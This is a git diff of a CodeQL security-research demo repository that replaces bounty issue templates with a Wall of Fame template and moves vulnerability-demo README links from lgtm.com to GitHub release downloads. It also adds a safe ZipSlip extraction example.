diff --git a/.github/ISSUE_TEMPLATE/all-for-one.yml b/.github/ISSUE_TEMPLATE/all-for-one.yml deleted file mode 100644 index 80c62dc..0000000 --- a/.github/ISSUE_TEMPLATE/all-for-one.yml +++ /dev/null @@ -1,90 +0,0 @@ -name: All for One, One For All bounty submission -description: Submit a CodeQL query for the All For One, One For All bounty (https://securitylab.github.com/bounties#allforone) -title: "[]: " -labels: [All For One] -body: - - type: markdown - attributes: - value: | - # Introduction - - Thank you for submitting a query to the GitHub CodeQL project! - - After you submit this issue, the GitHub Security Lab and CodeQL teams will triage the submission and, if it meets the Query Bounty Program requirements, we will grant you a bounty through our HackerOne program. - - Please make sure to carefully read the [bounty program description and conditions](https://securitylab.github.com/bounties#allforone) - - # Questionnaire - - type: input - id: pr_url - attributes: - label: Query PR - description: Link to pull request with your CodeQL query - placeholder: | - ex. https://github.com/github/codeql/pull/nnnn - validations: - required: true - - type: dropdown - id: language - attributes: - label: Language - description: What programming language is your query written for? - options: - - Java - - Javascript - - GoLang - - Python - - C/C++ - - C# - validations: - required: true - - type: textarea - id: cve_ids - attributes: - label: CVE(s) ID list - description: Enter a list of the CVE ID(s) associated with this query, one bullet for each distinct CVE. GitHub will automatically link CVE IDs to the [GitHub Advisory Database](https://github.com/advisories). If the result(s) is **NOT YET** fixed **nor disclosed**, and you are still waiting for a CVE, then you can privately share your result via email to [security@github.com](mailto:security@github.com?subject=[BugBounty]%20Issue%20#000%20useful%20result) - placeholder: | - ex. - - [CVE-20nn-xxxx]() - - [CVE-20nn-yyyy]() - validations: - required: true - - type: input - id: cwe - attributes: - label: CWE - description: "[CWE](https://cwe.mitre.org/data/index.html) that best fits the vulnerability class modeled with your query" - placeholder: | - ex. CWE-502: Deserialization of Untrusted Data - validations: - required: false - - type: textarea - id: report - attributes: - label: Report - description: Describe the vulnerability. Provide any information you think will help GitHub assess the impact your query has on the open source community. - placeholder: | - 1. What is the vulnerability? - 2. How does the vulnerability work? - 3. What strategy do you use in your query to find the vulnerability? - 4. How have you reduced the number of **false positives**? - 5. Other information? - validations: - required: true - - type: checkboxes - id: social - attributes: - label: Are you planning to discuss this vulnerability submission publicly? (Blog Post, social networks, etc). - description: We would love to have you spread the word about the good work you are doing - options: - - label: "Yes" - - label: "No" - validations: - required: true - - type: input - id: social_url - attributes: - label: Blog post link - description: If you have already blogged about your query, please provide a link. - validations: - required: false diff --git a/.github/ISSUE_TEMPLATE/bug-slayer.yml b/.github/ISSUE_TEMPLATE/bug-slayer.yml deleted file mode 100644 index f08489f..0000000 --- a/.github/ISSUE_TEMPLATE/bug-slayer.yml +++ /dev/null @@ -1,66 +0,0 @@ -name: The Bug Slayer bounty submission -description: Submit a CodeQL query for the Bug Slayer bounty (https://securitylab.github.com/bounties) -title: "[]: " -labels: [The Bug Slayer] -body: - - type: markdown - attributes: - value: | - # Introduction - - Thank you for your submission to the bounty program! - - After you submit this issue, the GitHub Security Lab and CodeQL teams will triage the submission and, if it meets the Query Bounty Program requirements, we will grant you a bounty through our HackerOne program. - - Please make sure to carefully read the [bounty program description and conditions](https://securitylab.github.com/bounties/) - - # Questionnaire - - type: textarea - id: cve_ids - attributes: - label: CVE(s) ID list - description: Enter a list of the CVE ID(s) associated with this query, one bullet for each distinct CVE. You need at least four high severity CVEs or two critical severity CVEs. - placeholder: | - ex. - - [CVE-20nn-xxxx]() - - [CVE-20nn-yyyy]() - validations: - required: true - - type: input - id: a41_url - attributes: - label: All For One submission - description: Link to the All For One submission with your CodeQL query - placeholder: | - ex. https://github.com/github/securitylab/issues/nnn - validations: - required: true - - type: textarea - id: details - attributes: - label: Details - description: Detail here how you found each CVE with your query. You can provide LGTM results, links to codeql DBs, ... anything that demonstrates that your query finds each CVE. - placeholder: | - ex. - - link/to/my/lgtm/runs - - link/to/gist/with/modified/query - - link/to/codeql/db - validations: - required: true - - type: checkboxes - id: social - attributes: - label: Are you planning to discuss this vulnerability submission publicly? (Blog Post, social networks, etc). - description: We would love to have you spread the word about the good work you are doing - options: - - label: "Yes" - - label: "No" - validations: - required: true - - type: input - id: social_url - attributes: - label: Blog post link - description: If you have already blogged about your query, please provide a link. - validations: - required: false diff --git a/.github/ISSUE_TEMPLATE/wall-of-fame.yml b/.github/ISSUE_TEMPLATE/wall-of-fame.yml new file mode 100644 index 0000000..0489ed0 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/wall-of-fame.yml @@ -0,0 +1,59 @@ +name: CodeQL Wall of Fame submission +description: Propose an entry to the CodeQL Wall of Fame (https://securitylab.github.com/codeql-wall-of-fame) +title: "[wall-of-fame]: " +labels: [wall-of-fame] +body: + - type: markdown + attributes: + value: | + # Welcome! + + Thank you for submitting an entry for the CodeQL Wall of Fame! + + # Details + - type: input + id: date + attributes: + label: Date + description: Publication date of the blog post, in YYYY-MM-DD format + placeholder: | + ex. 2023-01-01 + validations: + required: true + - type: input + id: title + attributes: + label: Title + description: Title of the blog post + validations: + required: true + - type: input + id: author + attributes: + label: Author + description: Author of the blog post + validations: + required: true + - type: input + id: url + attributes: + label: URL + description: URL of the blog post + validations: + required: true + - type: input + id: cve + attributes: + label: CVE + description: CVE ID(s), comma separated + placeholder: | + ex. CVE-2023-0001, CVE-2023-0002 + validations: + required: true + - type: textarea + id: description + attributes: + label: Description + description: Short summary of the blog post + validations: + required: true diff --git a/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md b/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md index 8097be5..75f634d 100644 --- a/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md +++ b/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md @@ -1,3 +1 @@ -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/microsoft/chakracore/ChakraCore-revision-2017-April-12--18-13-26.zip) - -We now also have this query in our default suite: https://lgtm.com/rules/2156560627/ +Use [this snapshot](https://github.com/github/securitylab/releases/download/chakracore-codeql-database/ChakraCore-revision-2017-April-12--18-13-26.zip) diff --git a/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md b/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md index e08808d..6790efd 100644 --- a/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md +++ b/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md @@ -1,5 +1,5 @@ # Facebook Fizz integer overflow vulnerability (CVE-2019-3560) -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/facebook/fizz/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo. +Use [this snapshot](https://github.com/github/securitylab/releases/download/facebook-codeql-database/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo. [Fizz](https://github.com/facebookincubator/fizz) contained a remotely triggerable infinite loop. For more details about the bug, see this [blog post](https://securitylab.github.com/research/facebook-fizz-CVE-2019-3560). A proof-of-concept exploit is available [here](https://github.com/github/securitylab/tree/95c0bcc670f3b3d98a4d578f8993f8138092b94f/SecurityExploits/Facebook/Fizz/CVE-2019-3560). diff --git a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md index 545706d..5deeddc 100644 --- a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md +++ b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/qualcomm_copy_from_user) +[Blog post](https://securitylab.github.com/research/stack-buffer-overflow-qualcomm-msm/) -[Snapshot for this demo](https://downloads.lgtm.com/snapshots/cpp/qualcomm/msm/msm-4.4-revision-2017-May-07--08-33-56.zip) +[Snapshot for this demo](https://github.com/github/securitylab/releases/download/qualcomm-msm-codeql-database/msm-4.4-revision-2017-May-07--08-33-56.zip) The blog post was written before we had the C++ dataflow library, so these demo queries are a bit different than the blog post. diff --git a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md index b9f2ed7..042a1df 100644 --- a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md +++ b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782) +[Blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/) Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221). -[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug. +[This snapshot](https://github.com/github/securitylab/releases/download/xnu-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug. diff --git a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md index 7ca34fd..d8abe1c 100644 --- a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md +++ b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/apple_xnu_nfs_boot_CVE-2018-4136_CVE-2018-4160) +[Blog post](https://securitylab.github.com/research/apple-xnu-nfs-boot/) Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692). -[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug. +[This snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug. diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql index b34679d..8a11f96 100644 --- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql +++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql @@ -10,7 +10,7 @@ /* * This query is explained in detail in this blog post: * - * https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 + * https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/ * * It is based on the assumption that the function `m_mtod`, which returns * a pointer to the data stored in an `mbuf`, often returns a buffer diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md index cae2e9c..adbf857 100644 --- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md +++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md @@ -1,5 +1,5 @@ # Apple XNU icmp_error CVE-2018-4407 -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo. +Use [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.6-codeql-database/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo. -There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://lgtm.com/blog/apple_xnu_icmp_nfs_pocs), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`. +There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://securitylab.github.com/research/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`. diff --git a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md index 58bc6be..9304638 100644 --- a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md +++ b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md @@ -1,4 +1,4 @@ -https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904 +https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/ There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5. @@ -8,6 +8,6 @@ For a demo, the best query to show is `tcphdr_mbuf_copydata.ql`, because it show `InfiniteLoop.ql` is a query inspired by one of the bugs in this code: the loop might not terminate because the loop counter is updated with a compound assignment (`+=`). We wrote an exploit which causes the right hand side of the assignment to be zero, which means that the loop runs forever. -All three queries find results in [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13). +All three queries find results in [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13). -The queries also find results in [this newer snapshot for 10.13.3](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong. +The queries also find results in [this newer snapshot for 10.13.3](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong. diff --git a/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md b/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md index 8e08a09..6605aa1 100644 --- a/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md +++ b/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md @@ -2,7 +2,7 @@ This is demo is an example of variant analysis on a recent [bugfix](https://gith The fix prevents an out-of-bounds access when processing malformed BMP files: when reading a BMP file, the library allocates a colour map based on the number of colours declared in the BMP header. Later on, individual bytes are read from the file and used as indices into this colour map. Previously, this was done without checking whether the byte actually represented a valid colour, which could cause an out-of-bounds access. The fix introduces a field in the same struct as the colour map that records its size, and checks the index against it, aborting with an error if the index is out of range. -A snapshot of libjpeg-turbo from before the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip). +A snapshot of libjpeg-turbo from before the fix is [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database-patched/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip). The first five QL files develop a query that flags exactly the fixed accesses on the former snapshot, and nothing on the latter; the last query is a generalisation that finds a new instance of the same problem. All queries are run on the fixed snapshot, except when stated otherwise. @@ -11,6 +11,6 @@ The first five QL files develop a query that flags exactly the fixed accesses on - 02b_find_guarded_colormap_index_working.ql: The previous query doesn't actually work, since `ERREXIT` isn't recognised as being a non-returning macro. This query fixes that. - 03_find_unguarded_colormap_index.ql: Flipping the logic around, we now look for _unguarded_ indexing. This gives a few false positives in cases where `cmap_length` isn't used. There is still a guard in these cases, but it's against a parameter that happens to contain the size of the colour map. - 04_find_unguarded_colormap_no_fps.ql: Add inter-procedural tracking to reason about the flow of colour maps and their sizes. This eliminates the remaining FPs on the fixed snapshot, and gives the expected results on the original snapshot. - - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip). + - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database-patched/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip). Note that the final query is somewhat non-trivial (>100 LoC, uses global value numbering, guards and inter-procedural flow), so it's perhaps best used with an audience that has seen some simple QL before. diff --git a/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md b/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md index 2c2a630..4b595a5 100644 --- a/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md +++ b/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md @@ -1,9 +1,9 @@ # Eating error codes in libssh2 -Download this [snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo. +Download this [snapshot](https://github.com/github/securitylab/releases/download/libssh2-codeql-database/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo. This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug that we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released. -[This](https://lgtm.com/projects/g/libssh2/libssh2/snapshot/6e2f5563c80521b3cde72a6fcdb675c2e085f9cf/files/src/hostkey.c?sort=name&dir=ASC&mode=heatmap&__hstc=70225743.5fa8704c8874c6eafaef219923a26734.1534954774206.1564532078978.1564925733575.72&__hssc=70225743.2.1565139962633&__hsfp=997709570#L677) is an example of the bug. The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored. +The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored. For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local data flow and range analysis. diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md index 36c17f5..b03a616 100644 --- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md +++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140). +[Blog post](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/). -This bug was found by one of our [default queries](https://lgtm.com/rules/1505913226124/). However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query. +This bug was found by one of [CodeQL](https://codeql.github.com/) default queries. However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query. -Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/rsyslog/rsyslog/rsyslog-all-revision-2018-April-27--14-12-31.zip). +Use [this snapshot](https://github.com/github/securitylab/releases/download/rsyslog-codeql-database/rsyslog-all-revision-2018-April-27--14-12-31.zip). diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt index f18de68..bf1f72b 100644 --- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt +++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt @@ -1168,7 +1168,7 @@ which is now included 285 00:16:24,478 --> 00:16:28,858 -in our default suite on lgtm.com. +in our default suite on lgtm.com (NOW DEPRECATED). 286 00:16:29,340 --> 00:16:32,231 diff --git a/CodeQL_Queries/csharp/ZipSlip/README.md b/CodeQL_Queries/csharp/ZipSlip/README.md index 03822bb..3d5209d 100644 --- a/CodeQL_Queries/csharp/ZipSlip/README.md +++ b/CodeQL_Queries/csharp/ZipSlip/README.md @@ -2,7 +2,7 @@ ## Snapshot -Use [this snapshot](http://downloads.lgtm.com/snapshots/csharp/microsoft/powershell/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip) +Use [this snapshot](https://github.com/github/securitylab/releases/download/powershell-codeql-database/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip) of PowerShell. ## Introduction @@ -15,14 +15,12 @@ they had written a basic query and run it against a number of critical codebases Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine that query further and submit it as a [pull request](https://github.com/Semmle/ql/pull/54) against our open source QL repository. -It was deployed to [LGTM.com](https://lgtm.com) within 2 weeks where it was run over thousands of open source C# projects. +It was deployed to the now deprecated LGTM website within 2 weeks where it was run over thousands of open source C# projects. -Here are some [sample results](https://lgtm.com/rules/1506511188430/alerts/) for the ZipSlip query. -One of those projects was Microsoft PowerShell. +The CodeQL ZipSlip query found a vulnerability in Microsoft PowerShell. As a result of this query, [a senior Microsoft engineer](https://github.com/TravisEz13) -fixed this vulnerability in November 2018 in -[this PR](https://lgtm.com/projects/g/PowerShell/PowerShell/rev/b39a41109d86d9ba75f966e2d7b52b81fa629150). +fixed this vulnerability in November 2018. So how did they do it? @@ -48,5 +46,24 @@ This uses a global taint tracking configuration. # Final query -The [final query](https://lgtm.com/rules/1506511188430/) includes query help, and identifies various other sources and sinks, -but uses the same general structure. It also includes metadata for LGTM. +The final query below includes query help, and identifies various other sources and sinks, +but uses the same general structure. + +```ql +using System.IO; +using System.IO.Compression; +class Good +{ + public static void WriteToDirectory(ZipArchiveEntry entry, + string destDirectory) + { + string destFileName = Path.GetFullPath(Path.Combine(destDirectory, entry.FullName)); + string fullDestDirPath = Path.GetFullPath(destDirectory + Path.DirectorySeparatorChar); + if (!destFileName.StartsWith(fullDestDirPath)) { + throw new System.InvalidOperationException("Entry is outside the target dir: " + + destFileName); + } + entry.ExtractToFile(destFileName); + } +} +``` diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md index 99db29e..f53ac28 100644 --- a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md +++ b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md @@ -1,6 +1,6 @@ -[Blog post](https://lgtm.com/blog/apache_struts_CVE-2017-9805) +[Blog post](https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/) -[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-91ae344-CVE-2017-9805.zip) has the bug. Also, Mo has greated a copy of the project so that you can see [the result](https://lgtm.com/projects/g/mmosemmle/struts_9805/alerts/?mode=list&id=java%2Funsafe-deserialization) on [lgtm.com](https://lgtm.com/projects/g/mmosemmle/struts_9805). +[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-codeql-database/apache-struts-91ae344-CVE-2017-9805.zip) has the bug. This directory contains a copy of `UnsafeDeserialization.qll`, because I get a syntax error when I try to do `import Security.CWE.CWE-502.UnsafeDeserialization`. diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md index eb5e7bd..e03b9a1 100644 --- a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md +++ b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md @@ -1,8 +1,8 @@ # Apache Struts CVE-2018-11776 -[Blog post](https://lgtm.com/blog/apache_struts_CVE-2018-11776) +[Blog post](https://securitylab.github.com/research/apache-struts-CVE-2018-11776/) -[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug. +[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-CVE-2018-11776-codeql-database/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug. The queries in this directory are slightly simplified to make the demo easier to follow. As a result, they don't find as many variants as the query described in the blog post. The full query can be found [here](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql). diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql index 55e2e08..9bc5cf4 100644 --- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql +++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql @@ -89,10 +89,7 @@ class IsVarNameSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, Da } } -// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName: -// -// https://lgtm.com/projects/g/ether/etherpad-lite/rev/dd7894d3c9389a000d11d3a89962d9fcc9c6c44b -// +// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName. // This version of the query adds a sanitizer to exclude those results. from Configuration xss, DataFlow::PathNode source, DataFlow::PathNode sink where xss.hasFlowPath(source, sink) diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md index 95a12a7..ab633c3 100644 --- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md +++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md @@ -1,5 +1,5 @@ -[Blog post](https://lgtm.com/blog/etherpad_CVE-2018-6835) +[Blog post](https://securitylab.github.com/research/etherpad-reflected-file-download/) -[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) has the vulnerability. +[This snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) has the vulnerability. -For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip). +For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-patched-codeql-database/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip). diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md index 96ee549..041dc4b 100644 --- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md +++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md @@ -1,8 +1,8 @@ This is an alternative presentation of the query from the blog post about -[Detecting Reflected File Download vulnerabilities using QL](https://lgtm.com/blog/etherpad_CVE-2018-6835), +[Detecting Reflected File Download vulnerabilities using QL](https://securitylab.github.com/research/etherpad-reflected-file-download/), phrasing it as a customization of Semmle's standard Reflected XSS query. -Use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2) +Use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2) for the initial stages of the development. All snapshots were built using version 1.9.3 of the Semmle toolchain; if you are using 1.20 or newer you will need to upgrade them. @@ -24,13 +24,13 @@ for the initial stages of the development. All snapshots were built using versio The developers [fixed](https://github.com/ether/etherpad-lite/commit/a2992b3) the vulnerability by introducing a sanitizer using the [is-var-name](https://www.npmjs.com/package/is-var-name) npm package. -[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_a2992b3.zip) corresponds to the fix commit. +[This snapshot](https://github.com/github/securitylab/releases/tag/etherpad-patched-codeql-database) corresponds to the fix commit. The standard library does not include a model for `is-var-name` (it is not a very widely used package), but 